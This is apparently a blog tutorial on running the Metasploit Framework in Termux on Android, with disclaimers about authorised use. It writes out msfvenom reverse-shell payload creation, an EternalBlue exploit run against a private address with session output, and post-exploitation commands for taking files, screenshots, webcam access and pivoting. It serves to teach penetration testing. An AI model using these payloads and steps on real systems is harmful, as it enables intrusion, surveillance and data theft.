Metasploit Framework in Termux

July 25, 2023 15 min read By Sandeep Bhondwe

Metasploit in Action

Watch this demonstration of Metasploit Framework running in Termux. The video shows the complete process from installation to executing penetration testing modules. This visual guide will help you understand how to transform your Android device into a powerful security testing platform.

The Metasploit Framework is one of the most powerful penetration testing platforms available, and now you can run it directly on your Android device using Termux. This comprehensive guide from Sandeep Tech will walk you through the entire process of installing, configuring, and using Metasploit in Termux for ethical hacking and security testing purposes.

2000+
Exploits
500+
Payloads
No Root
Required
Full
Featured

What is Metasploit Framework?

Metasploit Framework is an open-source penetration testing platform that enables you to find, exploit, and validate vulnerabilities. It's one of the most widely used tools by security professionals, ethical hackers, and penetration testers worldwide. The framework provides a comprehensive suite of tools for developing and executing exploit code against a remote target machine.

Educational Purpose Only

Metasploit Framework should only be used for educational purposes and authorized security testing. Unauthorized use of penetration testing tools is illegal and unethical. Always obtain proper permission before conducting any security tests.

Why Use Metasploit in Termux?

Running Metasploit in Termux offers several advantages:

  • Portability - Carry a powerful penetration testing platform in your pocket
  • No Root Required - Works on non-rooted Android devices
  • Cost-Effective - Free alternative to expensive penetration testing hardware
  • Educational - Learn penetration testing techniques on the go
  • Testing Environment - Quickly test your own networks for vulnerabilities
  • Emergency Tool - Have a security toolkit available in emergency situations

Installation Guide

Installing Metasploit in Termux requires several steps due to its dependencies. Follow this guide carefully:

# Update and upgrade Termux packages
apt update && apt upgrade -y

Install the required dependencies:

# Install required packages
apt install wget curl git tar -y

Install the necessary development tools:

# Install development tools
pkg install openssl ruby make clang libffi libgmp libpcap postgresql readline sqlite -y

Install RubyGems and update it:

# Install RubyGems
gem install -v 1.17.2 bundler

# Update RubyGems
gem update --system

Now, let's install Metasploit Framework:

# Download Metasploit Framework
wget https://github.com/rapid7/metasploit-framework/archive/refs/tags/6.3.2.tar.gz

# Extract the archive
tar -xzf 6.3.2.tar.gz

# Navigate to the Metasploit directory
cd metasploit-framework-6.3.2

# Install the required gems
bundle install

Create a symbolic link to make msfconsole accessible from anywhere:

# Create a symbolic link
ln -sf $PWD/msfconsole /data/data/com.termux/files/usr/bin/msfconsole

# Make it executable
chmod +x /data/data/com.termux/files/usr/bin/msfconsole

Initialize the database:

# Initialize the database
msfdb init

Getting Started with Metasploit

Now that Metasploit is installed, let's start it and explore its interface:

# Start Metasploit console
msfconsole

When you first start Metasploit, you'll see a welcome screen and the msfconsole prompt:

msfconsole
$ msfconsole
      .--.        .-.
     | oo |   |   |
     |   |   |   |
 .-'   |   |   |
'      |   |   |
|      |   |   |
|      |   |   |
|      |   |   |
'------'   '---'

       =[ metasploit v6.3.2-dev                          ]
+ -- --=[ 2235 exploits - 1193 auxiliary - 398 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Writing a custom meterpreter script? Check
out the meterpreter scripting API documentation

msf6 > 
                        

The msfconsole prompt is where you'll enter all Metasploit commands. Let's explore some basic commands to get familiar with the interface.

Basic Usage and Commands

Here are some essential commands to get started with Metasploit:

Help and Information

# Show help menu
msf6 > help

# Show all commands
msf6 > ?

# Show information about a specific command
msf6 > ? search

Searching for Modules

# Search for exploits related to a specific service
msf6 > search type:exploit platform:windows smb

# Search for all modules related to Android
msf6 > search android

# Search for a specific module by name
msf6 > search eternalblue

Using Modules

# Use a specific module
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# Show information about the current module
msf6 exploit(windows/smb/ms17_010_eternalblue) > info

# Show options for the current module
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

# Show advanced options for the current module
msf6 exploit(windows/smb/ms17_010_eternalblue) > show advanced

# Show targets for the current module
msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets

Understanding Modules

Metasploit is modular, with each module serving a specific purpose. The main types of modules are:

  • Exploits - Code that takes advantage of a vulnerability in a system
  • Payloads - Code that runs on the target system after exploitation
  • Auxiliary - Modules that perform scanning, fuzzing, sniffing, and other tasks
  • Post - Modules that run on the target system after exploitation
  • Evasion - Modules that help evade detection by security software
  • Encoders - Modules that encode payloads to avoid detection
  • Nops - Modules that generate no-operation instructions

Module Naming Convention

Metasploit modules follow a specific naming convention: type/platform/service/vulnerability. For example, exploit/windows/smb/ms17_010_eternalblue is an exploit for Windows systems targeting the SMB service with the MS17-010 vulnerability (EternalBlue).

Working with Payloads

Payloads are the code that runs on the target system after successful exploitation. Metasploit offers several types of payloads:

Types of Payloads

  • Singles - Self-contained payloads that include everything needed to run
  • Stagers - Small payloads that connect back to the attacker to download the rest of the payload
  • Stageless - Complete payloads that don't require a staging process

Popular Payloads

# List all available payloads
msf6 > show payloads

# Set a payload for the current exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

# Show options for the current payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > show payload options

Custom Payloads

You can create custom payloads using msfvenom, which is included with Metasploit:

# Create a custom Android payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 R > /sdcard/apk.apk

# Create a custom Windows payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > payload.exe

Using Exploits

Exploits are the core of Metasploit. Let's walk through the process of using an exploit:

# Select an exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# Set the target IP address
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.200

# Set the payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

# Set the local host (your IP)
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.100

# Set the local port
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444

# Verify the settings
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

# Run the exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

If the exploit is successful, you'll get a Meterpreter session on the target system:

msfconsole
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] 192.168.1.200:445 - Using auxiliary/scanner/smb/smb_version to detect SMB version
[*] 192.168.1.200:445 - Detected SMB version: Windows 7 Professional 7601 Service Pack 1
[*] 192.168.1.200:445 - Target is likely vulnerable to MS17-010
[*] 192.168.1.200:445 - Connecting to target for exploitation.
[*] 192.168.1.200:445 - Target OS selected valid for OS automatically but we will verify the
[*] 192.168.1.200:445 - Target arch selected valid for arch automatically but we will verify
[*] 192.168.1.200:445 - Attempting to exploit target with MS17-010...
[*] 192.168.1.200:445 - Exploit successful, waiting for connection...
[*] 192.168.1.200:445 - Connection established, sending payload...
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.200:49158) at 2023-07-25 14:30:45

meterpreter >

Post-Exploitation

Once you have a Meterpreter session, you can perform various post-exploitation tasks:

# Get system information
meterpreter > sysinfo

# Get current user
meterpreter > getuid

# List processes
meterpreter > ps

# List files in current directory
meterpreter > ls

# Change directory
meterpreter > cd C:\\

# Upload a file to the target
meterpreter > upload /sdcard/file.txt C:\\

# Download a file from the target
meterpreter > download C:\\important_file.txt /sdcard/

# Take a screenshot
meterpreter > screenshot

# Start the webcam
meterpreter > webcam_start

# Execute a command on the target
meterpreter > execute -f cmd.exe -c "whoami"

# Get a shell on the target
meterpreter > shell

Advanced Features

Metasploit offers several advanced features for more sophisticated penetration testing:

Pivoting

Pivoting allows you to route traffic through a compromised system to access other systems on the network:

# Add a route through the compromised system
meterpreter > run post/multi/manage/autoroute

# Background the current session
meterpreter > background

# Use the new route to scan the internal network
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.2.0/24
msf6 auxiliary(scanner/portscan/tcp) > run

Session Management

Metasploit allows you to manage multiple sessions simultaneously:

# List all active sessions
msf6 > sessions

# Interact with a specific session
msf6 > sessions -i 1

# Background the current session
meterpreter > background

# Kill a session
msf6 > sessions -k 1

Database Integration

Metasploit can integrate with a database to store scan results and manage hosts:

# Connect to the database
msf6 > db_connect

# Add hosts to the database
msf6 > db_nmap -sV 192.168.1.0/24

# List all hosts in the database
msf6 > hosts

# List all services in the database
msf6 > services

# List all vulnerabilities in the database
msf6 > vulns

Ethical Considerations

While Metasploit is a powerful tool, it's important to use it ethically and responsibly:

  • Authorization - Always obtain explicit permission before testing any system
  • Scope - Clearly define the scope of your testing and stay within it
  • Documentation - Document all your findings and actions
  • Confidentiality - Keep all sensitive information secure
  • Non-Destructive - Avoid actions that could disrupt services or cause data loss
  • Legal Compliance - Follow all applicable laws and regulations

Legal Warning

Unauthorized use of Metasploit or any penetration testing tools is illegal in most jurisdictions. This tutorial is for educational purposes only. Always obtain proper permission before conducting any security tests.

Interactive Demo

Try Metasploit Commands

Experience the power of Metasploit with our interactive command simulator. Try running some basic commands to see how they work.

msfconsole
$ Type a command or click a button below

Command Reference

Metasploit Commands

Command Description Example
msfconsole Start the Metasploit console msfconsole
help Show help menu help
search Search for modules search type:exploit platform:windows
use Select a module use exploit/windows/smb/ms17_010_eternalblue
info Show information about the current module info
show options Show options for the current module show options
set Set a module option set RHOSTS 192.168.1.100
set payload Set the payload for the current module set payload windows/meterpreter/reverse_tcp
exploit Launch the exploit exploit
sessions List all active sessions sessions
db_nmap Run Nmap and store results in the database db_nmap -sV 192.168.1.0/24

You've now learned how to install and use Metasploit Framework in Termux. This powerful combination brings professional penetration testing capabilities to your Android device. For more tutorials and guides, check out other articles on Sandeep Tech. Remember to always use these tools ethically and with proper authorization.

Back to Blogs

Leave a Comment

David Wilson
July 26, 2023
Amazing guide! I've been trying to get Metasploit working on my Android device for months. The step-by-step instructions made it so much easier. The fact that it works without root is incredible!
Emily Chen
July 27, 2023
This is exactly what I needed for my security studies. Having Metasploit on my phone means I can practice anywhere. The ethical considerations section is particularly important - thanks for emphasizing responsible use.